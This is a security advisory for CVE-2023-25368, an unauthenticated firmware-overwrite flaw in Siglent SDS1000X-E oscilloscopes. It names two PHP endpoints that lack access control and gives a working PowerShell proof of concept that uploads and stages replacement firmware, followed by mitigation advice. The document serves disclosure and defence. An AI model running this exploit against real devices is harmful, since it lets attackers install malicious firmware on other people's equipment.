CVE-2023-25368: CVE/CVE-2023-25368.md at main · BretMcDanel/CVE

Description

Siglent SDS 1104X-E SDS1xx4X-E_V6.1.37R9.ADS is vulnerable to Incorrect Access Control. An unauthenticated attacker can overwrite firmnware.

Discovery Information

Date: December 2022
Discoverer: Bret McDanel

Versions

At least SDS1xx4X-E_V6.1.37R9.ADS, and possibly earlier. Reportedly fixed May 2023. It is unknown if other devices have a similar flaw as they were unavailable to the researcher at the time research was performed.

Background

The SIGLENT SDS1000X-E is a two and four channel oscilloscope. Controlling the various features is an embedded system running Linux. The oscilloscope has an ethernet port and optional USB wifi and has an enabled embedded web server.

References

https://siglent.com

Vulnerability****CWE 284: Improper Access Control****Affected Ports

• Web Port: 80 (tcp)

Discussion

Two PHP scripts do not require authentication. One script can be used to upload firwmare, the other will expand the firmware and ready it for installation at next reboot.

The first script, /deviceupdate.php, requires the file to be sent as an application/octet-stream and end in .ADS.

The next script, /device_read_write.php, accepts certain commands one of which causes the firmware to be unpackaged and readied for installation. It relies upon information that is output from /deviceupdate.php.

The firmware is encrypted with a modified DES algorithm. However, this presents little challenge as there are programs that have been public for over a decade that will unpack existing firmware files and allow for repacking into new, valid, firmware files. This process is documented at length on relevant forums to the oscilloscope in general.

Proof of Concept****Language: Powershell

$firmware = "/path/to/firmware.ADS"
$host = "ip of target"

try {
    # Upload firmware
    $WebParams = @(
        Method = "POST"
        Uri = "${host}/deviceupdate.php"
        ContentType = "application/octet-stream"
        Form = @{
            "in_device_version" = Get-Item -Path $firmware
        }
    )
    $resp = Invoke-WebRequest @WebParams -ErrorAction Stop
    $jsonData = ($resp.content | ConvertFrom-Json)

    # Unpack firwmare
    $cmd="%7B%22path%22%3A%22$($jsonData.path)%22%2C%22versionname%22%3A%22$($jsonData.versionname)%22%2C%22type%22%3A%22SSG%22%2C%22to%22%3A%22127.0.0.1%22%7D"
    $WebParams = @(
        Method = "POST"
        Uri = "${host}/device_read_write.php"
        Form = @{
            cmd = $cmd
        }
    )
    Invoke-WebRequest @WebParams -ErrorAction Stop
} catch {
    Write-Error "Unable to write firmware $($_.Exception.Response.ReasonPhrase)"
}
Write-Host "Firmware uploaded, reboot device to install new firmware (use CVE-2023-25367)"

Mitigation

It is advised to upgrade to the current version of firmware. Further, IoT devices, such as oscilloscopes, should be placed on a segregated network and access to the affected ports be blocked from untrusted hosts.